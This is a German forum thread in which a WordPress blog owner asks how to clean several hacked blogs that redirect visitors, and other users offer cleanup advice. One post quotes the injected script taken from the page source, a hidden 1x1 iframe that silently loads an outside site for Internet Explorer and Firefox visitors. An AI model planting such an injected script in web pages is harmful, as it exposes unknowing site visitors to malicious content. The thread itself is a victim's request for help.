Blogs gehackt! was tun?

  • Hallo liebe Freunde, ich habe ein ziemlich großes Problem:

    Vor 3 Wochen habe ich festgestellt,dass ein Blog von mir nach dem Aufrufen umgeleitet wird auf diese Seite [FONT=Times New Roman][COLOR=red]hotplay24 dot net[/COLOR][/FONT]
    Also gehackt.
    Da ich die alte Version auf meinem Rechner gespeichert hatte,habe ich die Daten auf FTP server gelöscht und WP nocheinmal uploaded. Im Augenblick funktioniert es..
    Heute habe ich bei meinem anderen Blog genau dasselbe, Nur das blöde ist, dass ich die Seite nicht auf meinem Homerechner gespeichert habe.
    Im Quelltext habe ich ein Script,was auf die Hacker hinweisst.

    Was kann ich machen,um das über zu beseitigen?

    Danke im Voraus
    Sharafi
    [COLOR=darkred]ps: inzwischen habe ich festgestellt,dass 2 andere Blogs von mir auch gehackt wurden[/COLOR]

    • Anzeige

    Hallo!

    Wenn du gerade an deiner Website arbeitest oder dein aktuelles Hosting überdenkst: Wir betreiben mit NetzLiving eine Hosting-Plattform, die speziell auf Performance, Sicherheit und einfache Verwaltung ausgelegt ist.

    • ✔️ Schnelle Ladezeiten (optimiert für WordPress & Co.)
    • ✔️ Deutsche Server & DSGVO-konform
    • ✔️ Persönlicher Support (kein 0815-Ticket-System)

    Mehr erfahren

  • Warum?


    ralf

    > Bitte erweitere den Text auf die minimale Länge von 10 Zeichen.

    weil ich gerne mal das script sehen würde und ob sich sonst noch was darin versteckt. habe da so meine erfahrungen mit hackern gemacht, so 20 blogs sind mal gehackt worden von mir. ok.


  • Da ich die alte Version auf meinem Rechner gespeichert hatte,habe ich die Daten auf FTP server gelöscht und WP nocheinmal uploaded. Im Augenblick funktioniert es..

    Du musst die Sicherheitslücke suchen, finden und diese beseitigen.

    Evtl. helfen dir die Anleitungen und Tipps von Google weiter
    http://support.google.com/webmasters/bin…e&answer=163634

    Solltest du dies nicht selber können - solltest du dir jemanden suchen.
    Mein Team kann dir evtl. helfen schnelle@blogrettung.de



    Heute habe ich bei meinem anderen Blog genau dasselbe, Nur das blöde ist, dass ich die Seite nicht auf meinem Homerechner gespeichert habe.

    evtl. verfügt dein Provider über eine Datensicherung? Auch hier solltest du die Sicherheitslücke eben schließen.

    Viel Glück

    ralf

    Mit offenen Augen träumen

  • Am ende steht:
    [COLOR=#0000ff]</[/COLOR][COLOR=#800000]html[/COLOR][COLOR=#0000ff]>[/COLOR][COLOR=#0000ff]<[/COLOR][COLOR=#800000]script[/COLOR][COLOR=#0000ff]>[/COLOR][COLOR=#0000ff]var[/COLOR] url = [COLOR=#800000]"http://hotplay24.net"[/COLOR];[COLOR=#0000ff]if[/COLOR] ((navigator.userAgent.toLowerCase().indexOf([COLOR=#800000]"msie"[/COLOR]) >= [COLOR=#ff0000]0[/COLOR]) || (navigator.userAgent.toLowerCase().indexOf([COLOR=#800000]"firefox"[/COLOR]) >= [COLOR=#ff0000]0[/COLOR])){ [COLOR=#0000ff]var[/COLOR] f = document.createElement([COLOR=#800000]'iframe'[/COLOR]); f.setAttribute([COLOR=#800000]"width"[/COLOR], [COLOR=#800000]"1"[/COLOR]); f.setAttribute([COLOR=#800000]"height"[/COLOR], [COLOR=#800000]"1"[/COLOR]); f.setAttribute([COLOR=#800000]"src"[/COLOR], url); f.setAttribute([COLOR=#800000]"style"[/COLOR], [COLOR=#800000]"visibility: hidden; position: absolute; left: 0pt; top: 0pt;"[/COLOR]); document.getElementsByTagName([COLOR=#800000]"body"[/COLOR])[[COLOR=#ff0000]0[/COLOR]].appendChild(f);}[COLOR=#0000ff]</[/COLOR][COLOR=#800000]script[/COLOR][COLOR=#0000ff]>[/COLOR][COLOR=#0000ff]<[/COLOR][COLOR=#800000]script[/COLOR][COLOR=#0000ff]>[/COLOR][COLOR=#0000ff]var[/COLOR] url = [COLOR=#800000]"http://hotplay24.net"[/COLOR];[COLOR=#0000ff]if[/COLOR] ((navigator.userAgent.toLowerCase().indexOf([COLOR=#800000]"msie"[/COLOR]) >= [COLOR=#ff0000]0[/COLOR]) || (navigator.userAgent.toLowerCase().indexOf([COLOR=#800000]"firefox"[/COLOR]) >= [COLOR=#ff0000]0[/COLOR])){ [COLOR=#0000ff]var[/COLOR] f = document.createElement([COLOR=#800000]'iframe'[/COLOR]); f.setAttribute([COLOR=#800000]"width"[/COLOR], [COLOR=#800000]"1"[/COLOR]); f.setAttribute([COLOR=#800000]"height"[/COLOR], [COLOR=#800000]"1"[/COLOR]); f.setAttribute([COLOR=#800000]"src"[/COLOR], url); f.setAttribute([COLOR=#800000]"style"[/COLOR], [COLOR=#800000]"visibility: hidden; position: absolute; left: 0pt; top: 0pt;"[/COLOR]); document.getElementsByTagName([COLOR=#800000]"body"[/COLOR])[[COLOR=#ff0000]0[/COLOR]].appendChild(f);}[COLOR=#0000ff]</[/COLOR][COLOR=#800000]script[/COLOR][COLOR=#0000ff]>[/COLOR]
    [COLOR=#0000ff][/COLOR]
    [COLOR=#0000ff][/COLOR]
    [COLOR=#0000ff]Übrigens meine gehackte seite ist Logjet dot com[/COLOR]
    [COLOR=#0000ff][/COLOR]
    [COLOR=#0000ff]Sharafi[/COLOR]

    Einmal editiert, zuletzt von Sharafi (19. Januar 2012 um 14:04)

  • weil ich gerne mal das script sehen würde und ob sich sonst noch was darin versteckt. habe da so meine erfahrungen mit hackern gemacht, so 20 blogs sind mal gehackt worden von mir. ok.

    Wenn du als Blogbetreiber einen Angriff festgestellt hast kannst du perse keiner Datei mehr auf dem Server trauen - ergo: Dateien löschen, die Sicherheitslücke beseitigen und eine Malware freie Version hochladen.

    Punkt -

    Alles andere ist wirklich Zeitverschwendung oder nette Unterhaltung dritter...

    Bringt aber dem TE aber nichts.

    Gruß

    ralf

    Mit offenen Augen träumen

  • schau mal in deinen image-ordner ob da eventuell ein image drin ist (png), was da absolut nicht hingehört bzw. völlig überflüssig ist. wenn ja, dann weg damit.

  • das ist quatsch, es kann auch einfach nur der admin-bereich gehackt worden sein (dashbord) und nicht der server. sage doch ich habe da so meine erfahrungen.

  • Ich habe in der Tat die gehackte Seite LogJet dot com mit http://sitecheck.sucuri.net/scanner/ gescannt und es wurde malware festgestellt.

    Bei dem Blog, den ich auf meinem Rechner gespeichert hatte und nochmal auf server uploaden konnte (Hier handelt sich auf Worldfoodvision dot com) hat scanning keine malware entdeckt.
    Wollen wir mal sehen,wie lange!!!!

    Sharafi

  • Hab genau den gleichen Hacker in meinen Blogs. Die Umleitung ist nur bei Firefox und IE aktiv. Scheint über WP-Admin gekommen zu sein, denn mein Hoster meldet alles OK.
    Bin mal gespannt was bei dir rauskommt.

  • Freunde,ich bin was WP wissen angeht,nicht mal ein Erstsemestler!!!
    Wenn,etwas im Adminbereich des gehackten blog (logjet dot com) mit einem image zu tun haben sollte,habe ich mir in meinem ftp server den ordner image angesehen:

    drwxr-xr-x 7 p7421054 ftpusers 4096 Jul 17 2008 .
    [COLOR=red]drwxr-xr-x 5 p7421054 ftpusers 4096 Jan 14 22:36 ..[/COLOR]
    -rw-r--r-- 1 p7421054 ftpusers 18030 Jul 17 2008 admin-ajax.php
    [COLOR=red]-rw-r--r-- 1 p7421054 ftpusers 987 Jan 14 22:42 admin-footer.php[/COLOR]
    -rw-r--r-- 1 p7421054 ftpusers 182 Jul 17 2008 admin-functions.php
    [COLOR=red]-rw-r--r-- 1 p7421054 ftpusers 6863 Jan 14 22:42 admin-header.php[/COLOR]
    -rw-r--r-- 1 p7421054 ftpusers 432 Jul 17 2008 admin-post.php
    -rw-r--r-- 1 p7421054 ftpusers 3064 Jul 17 2008 admin.php
    -rw-r--r-- 1 p7421054 ftpusers 1416 Jul 17 2008 async-upload.php
    -rw-r--r-- 1 p7421054 ftpusers 5473 Jul 17 2008 categories.php
    -rw-r--r-- 1 p7421054 ftpusers 6986 Jul 17 2008 comment.php
    drwxr-xr-x 2 p7421054 ftpusers 4096 Jul 17 2008 css
    [COLOR=red]-rw-r--r-- 1 p7421054 ftpusers 12100 Jan 14 22:42 custom-header.php[/COLOR]
    -rw-r--r-- 1 p7421054 ftpusers 4244 Jul 17 2008 edit-attachment-rows.php
    -rw-r--r-- 1 p7421054 ftpusers 3064 Jul 17 2008 edit-category-form.php
    -rw-r--r-- 1 p7421054 ftpusers 8183 Jul 17 2008 edit-comments.php
    -rw-r--r-- 1 p7421054 ftpusers 18780 Jul 17 2008 edit-form-advanced.php
    -rw-r--r-- 1 p7421054 ftpusers 4445 Jul 17 2008 edit-form-comment.php
    -rw-r--r-- 1 p7421054 ftpusers 3115 Jul 17 2008 edit-form.php
    -rw-r--r-- 1 p7421054 ftpusers 4585 Jul 17 2008 edit-link-categories.php
    -rw-r--r-- 1 p7421054 ftpusers 2208 Jul 17 2008 edit-link-category-form.php
    -rw-r--r-- 1 p7421054 ftpusers 14940 Jul 17 2008 edit-link-form.php
    -rw-r--r-- 1 p7421054 ftpusers 14864 Jul 17 2008 edit-page-form.php
    -rw-r--r-- 1 p7421054 ftpusers 7316 Jul 17 2008 edit-pages.php
    -rw-r--r-- 1 p7421054 ftpusers 6040 Jul 17 2008 edit-post-rows.php
    -rw-r--r-- 1 p7421054 ftpusers 1908 Jul 17 2008 edit-tag-form.php
    -rw-r--r-- 1 p7421054 ftpusers 4913 Jul 17 2008 edit-tags.php
    -rw-r--r-- 1 p7421054 ftpusers 7944 Jul 17 2008 edit.php
    -rw-r--r-- 1 p7421054 ftpusers 1463 Jul 17 2008 export.php
    -rw-r--r-- 1 p7421054 ftpusers 11075 Jul 17 2008 gears-manifest.php
    drwxr-xr-x 2 p7421054 ftpusers 4096 Jul 17 2008 images
    drwxr-xr-x 2 p7421054 ftpusers 4096 Jul 17 2008 import
    -rw-r--r-- 1 p7421054 ftpusers 1445 Jul 17 2008 import.php
    drwxr-xr-x 2 p7421054 ftpusers 4096 Jul 17 2008 includes
    -rw-r--r-- 1 p7421054 ftpusers 514 Jul 17 2008 index-extra.php
    [COLOR=red]-rw-r--r-- 1 p7421054 ftpusers 6494 Jan 14 22:42 index.php[/COLOR]
    -rw-r--r-- 1 p7421054 ftpusers 4043 Jul 17 2008 install-helper.php
    -rw-r--r-- 1 p7421054 ftpusers 4272 Jul 17 2008 install.php
    drwxr-xr-x 2 p7421054 ftpusers 4096 Jul 17 2008 js
    -rw-r--r-- 1 p7421054 ftpusers 691 Jul 17 2008 link-add.php
    -rw-r--r-- 1 p7421054 ftpusers 2156 Jul 17 2008 link-category.php
    -rw-r--r-- 1 p7421054 ftpusers 4030 Jul 17 2008 link-import.php
    -rw-r--r-- 1 p7421054 ftpusers 7507 Jul 17 2008 link-manager.php
    -rw-r--r-- 1 p7421054 ftpusers 1760 Jul 17 2008 link-parse-opml.php
    -rw-r--r-- 1 p7421054 ftpusers 2397 Jul 17 2008 link.php
    -rw-r--r-- 1 p7421054 ftpusers 1141 Jul 17 2008 media-upload.php
    -rw-r--r-- 1 p7421054 ftpusers 3030 Jul 17 2008 media.php
    [COLOR=red]-rw-r--r-- 1 p7421054 ftpusers 6336 Jan 14 22:42 menu-header.php[/COLOR]
    -rw-r--r-- 1 p7421054 ftpusers 6629 Jul 17 2008 menu.php
    -rw-r--r-- 1 p7421054 ftpusers 100 Jul 17 2008 moderation.php
    -rw-r--r-- 1 p7421054 ftpusers 8198 Jul 17 2008 options-discussion.php
    -rw-r--r-- 1 p7421054 ftpusers 6169 Jul 17 2008 options-general.php
    -rw-r--r-- 1 p7421054 ftpusers 230 Jul 17 2008 options-head.php
    -rw-r--r-- 1 p7421054 ftpusers 3953 Jul 17 2008 options-misc.php
    -rw-r--r-- 1 p7421054 ftpusers 7807 Jul 17 2008 options-permalink.php
    -rw-r--r-- 1 p7421054 ftpusers 1349 Jul 17 2008 options-privacy.php
    -rw-r--r-- 1 p7421054 ftpusers 3646 Jul 17 2008 options-reading.php
    -rw-r--r-- 1 p7421054 ftpusers 6823 Jul 17 2008 options-writing.php
    -rw-r--r-- 1 p7421054 ftpusers 2800 Jul 17 2008 options.php
    -rw-r--r-- 1 p7421054 ftpusers 916 Jul 17 2008 page-new.php
    [COLOR=red]-rw-r--r-- 1 p7421054 ftpusers 5823 Jan 14 22:42 page.php[/COLOR]
    -rw-r--r-- 1 p7421054 ftpusers 5289 Jul 17 2008 plugin-editor.php
    -rw-r--r-- 1 p7421054 ftpusers 14487 Jul 17 2008 plugins.php
    -rw-r--r-- 1 p7421054 ftpusers 1435 Jul 17 2008 post-new.php
    -rw-r--r-- 1 p7421054 ftpusers 5793 Jul 17 2008 post.php
    -rw-r--r-- 1 p7421054 ftpusers 20572 Jul 17 2008 press-this.php
    -rw-r--r-- 1 p7421054 ftpusers 73 Jul 17 2008 profile.php
    -rw-r--r-- 1 p7421054 ftpusers 6289 Jul 17 2008 revision.php
    -rw-r--r-- 1 p7421054 ftpusers 5074 Jul 17 2008 rtl.css
    -rw-r--r-- 1 p7421054 ftpusers 6239 Jul 17 2008 setup-config.php
    -rw-r--r-- 1 p7421054 ftpusers 2626 Jul 17 2008 sidebar.php
    -rw-r--r-- 1 p7421054 ftpusers 5863 Jul 17 2008 theme-editor.php
    -rw-r--r-- 1 p7421054 ftpusers 7057 Jul 17 2008 themes.php
    -rw-r--r-- 1 p7421054 ftpusers 1426 Jul 17 2008 update-links.php
    -rw-r--r-- 1 p7421054 ftpusers 7027 Jul 17 2008 update.php
    -rw-r--r-- 1 p7421054 ftpusers 188 Jul 17 2008 upgrade-functions.php
    -rw-r--r-- 1 p7421054 ftpusers 2300 Jul 17 2008 upgrade.php
    -rw-r--r-- 1 p7421054 ftpusers 8138 Jul 17 2008 upload.php
    -rw-r--r-- 1 p7421054 ftpusers 11602 Jul 17 2008 user-edit.php
    -rw-r--r-- 1 p7421054 ftpusers 14307 Jul 17 2008 users.php
    -rw-r--r-- 1 p7421054 ftpusers 11498 Jul 17 2008 widgets.php
    -rw-r--r-- 1 p7421054 ftpusers 25511 Jul 17 2008 wp-admin.css

    So,die rotmarkierten sind einträge v.14.januar. Ich habe am 14.Januar gar nichts mit dem Blog gemacht und weiss nicht woher die Einträge kommen und was ich nun damit machen soll? Löschen?

    Danke
    Sharafi

  • scau doch mal auf die daten wann zuletzt die images hochgeladen wurden uind ob da eins bei ist, was nicht vom blog benötigt wird oder später hochgeladen wurde als alle anderen - oder noch einfach, ob eines am 14. hochgeladen wurde.

  • scau doch mal auf die daten wann zuletzt die images hochgeladen wurden uind ob da eins bei ist, was nicht vom blog benötigt wird oder später hochgeladen wurde als alle anderen - oder noch einfach, ob eines am 14. hochgeladen wurde.



    Die Rotmarkierten sind v.14.januar und sind neu.

    Sharafi

  • Die Rotmarkierten sind v.14.januar und sind neu.

    Sharafi

    wie heißen denn die images? oder meinst du php-seiten? ich kann aus den rot angemarkten zeilen oben kein image erkennen. reden wir überhaupt von der gleichen sache?

  • wie heißen denn die images? oder meinst du php-seiten? ich kann aus den rot angemarkten zeilen oben kein image erkennen. reden wir überhaupt von der gleichen sache?



    Ich habe die aus dem Ordner im Adminbereich beim Server.
    Es kann in der Tat so sein,dass ich das ganze nicht verstanden habe.

    Wo sollte ich den sonst suchen und vor allem was suchen?
    Danke

    Sharafi

  • gehe auf deinen server > wp-content > themes > dann deinen themeordner > img (oder images)

    dort liegen dann deine bilder drin (images), da mal schauen welche da drin liegen und ob alle, die dort drin sind benötig werden oder welche nachträglich hochgeladen wurden.

  • gehe auf deinen server > wp-content > themes > dann deinen themeordner > img (oder images)

    dort liegen dann deine bilder drin (images), da mal schauen welche da drin liegen und ob alle, die dort drin sind benötig werden oder welche nachträglich hochgeladen wurden.




    Also geguckt:
    Bei themes und bei z.Z.benutze Theme kann ich nichts bei images erkennen,was die Ursache sein könnte:

    [COLOR=darkred]"drwxr-xr-x 2 p7421054 ftpusers 4096 Oct 2 2008 .
    drwxr-xr-x 3 p7421054 ftpusers 4096 Oct 2 2008 ..
    -rw-r--r-- 1 p7421054 ftpusers 901 Oct 2 2008 arrow.gif
    -rw-r--r-- 1 p7421054 ftpusers 901 Oct 2 2008 arrow_left.gif
    -rw-r--r-- 1 p7421054 ftpusers 1147 Oct 2 2008 aside.jpg
    -rw-r--r-- 1 p7421054 ftpusers 14409 Oct 2 2008 bodybg.png
    -rw-r--r-- 1 p7421054 ftpusers 873 Oct 2 2008 bullet.gif
    -rw-r--r-- 1 p7421054 ftpusers 1054 Oct 2 2008 clock.gif
    -rw-r--r-- 1 p7421054 ftpusers 927 Oct 2 2008 comment.gif
    -rw-r--r-- 1 p7421054 ftpusers 1933 Oct 2 2008 comment_bota.jpg
    -rw-r--r-- 1 p7421054 ftpusers 2405 Oct 2 2008 comment_botb.jpg
    -rw-r--r-- 1 p7421054 ftpusers 39565 Oct 2 2008 comment_formbg.jpg
    -rw-r--r-- 1 p7421054 ftpusers 3926 Oct 2 2008 commenta.jpg
    -rw-r--r-- 1 p7421054 ftpusers 3239 Oct 2 2008 commentb.jpg
    -rw-r--r-- 1 p7421054 ftpusers 8800 Oct 2 2008 discussion.jpg
    -rw-r--r-- 1 p7421054 ftpusers 2945 Oct 2 2008 folder.gif
    -rw-r--r-- 1 p7421054 ftpusers 1007 Oct 2 2008 icon.gif
    -rw-r--r-- 1 p7421054 ftpusers 898 Oct 2 2008 list-item.gif
    -rw-r--r-- 1 p7421054 ftpusers 1169 Oct 2 2008 quote.jpg
    -rw-r--r-- 1 p7421054 ftpusers 1016 Oct 2 2008 search.gif"[/COLOR]

  • dann scheint es damit nichts zu tun zu haben. war ein versuch wert denke ich. die rot angemarkten php.seiten sind ja anscheinend neu bei dir hochgeladen worden, denke mal in diesen php-seiten versteckt sich der übeltäter. aber es ist natürlich schwer eine ferndiagnose zu geben, du solltest dir dann wohl doch hilfe holen, die dann auch auf deinen server schauen darf.

    viel erfolg noch.

Jetzt mitmachen!

Sie haben noch kein Benutzerkonto auf unserer Seite? Registrieren Sie sich kostenlos und nehmen Sie an unserer Community teil!